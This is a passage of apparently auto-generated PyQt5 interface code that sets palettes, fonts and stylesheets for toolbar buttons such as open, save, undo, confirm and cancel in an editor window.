brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.icon.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.icon.setFont(font)
self.icon.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.icon.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(self.__icon_path), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.icon.setIcon(icon)
self.icon.setIconSize(QtCore.QSize(40, 40))
self.icon.setObjectName("icon")
self.horizontalLayout_4.addWidget(self.icon)
self.operation = QtWidgets.QFrame(self.title)
self.operation.setMinimumSize(QtCore.QSize(250, 45))
self.operation.setMaximumSize(QtCore.QSize(250, 45))
self.operation.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.operation.setFrameShadow(QtWidgets.QFrame.Raised)
self.operation.setObjectName("operation")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.operation)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.btn_open = QtWidgets.QToolButton(self.operation)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_open.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_open.setFont(font)
self.btn_open.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_open.setObjectName("btn_open")
self.horizontalLayout_3.addWidget(self.btn_open)
self.btn_save = QtWidgets.QToolButton(self.operation)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_save.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_save.setFont(font)
self.btn_save.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_save.setObjectName("btn_save")
self.horizontalLayout_3.addWidget(self.btn_save)
self.btn_undo = QtWidgets.QToolButton(self.operation)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_undo.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_undo.setFont(font)
self.btn_undo.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_undo.setObjectName("btn_undo")
self.horizontalLayout_3.addWidget(self.btn_undo)
self.horizontalLayout_4.addWidget(self.operation)
spacerItem = QtWidgets.QSpacerItem(100, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem)
self.control = QtWidgets.QFrame(self.title)
self.control.setMinimumSize(QtCore.QSize(0, 45))
self.control.setMaximumSize(QtCore.QSize(120, 45))
self.control.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.control.setFrameShadow(QtWidgets.QFrame.Raised)
self.control.setObjectName("control")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.control)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.btn_confirm = QtWidgets.QToolButton(self.control)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_confirm.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_confirm.setFont(font)
self.btn_confirm.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_confirm.setObjectName("btn_confirm")
self.horizontalLayout_2.addWidget(self.btn_confirm)
self.btn_cancel = QtWidgets.QToolButton(self.control)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_cancel.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_cancel.setFont(font)
self.btn_cancel.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_cancel.setObjectName("btn_cancel")
self.horizontalLayout_2.addWidget(self.btn_cancel)
self.horizontalLayout_4.addWidget(self.control)
self.verticalLayout_3.addWidget(self.title)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setSpacing(0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.frame_4 = QtWidgets.QFrame(self.centralwidget)
self.frame_4.setMinimumSize(QtCore.QSize(90, 0))
self.frame_4.setMaximumSize(QtCore.QSize(90, 16777215))
self.frame_4.setStyleSheet("background: rgb(51, 51, 51)")
self.frame_4.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_4.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_4.setObjectName("frame_4")
self.frame_5 = QtWidgets.QFrame(self.frame_4)
self.frame_5.setGeometry(QtCore.QRect(10, 0, 56, 500))
self.frame_5.setMinimumSize(QtCore.QSize(0, 500))
self.frame_5.setMaximumSize(QtCore.QSize(16777215, 500))
self.frame_5.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_5.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_5.setObjectName("frame_5")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame_5)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.btn_clip = QtWidgets.QPushButton(self.frame_5)
self.btn_clip.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
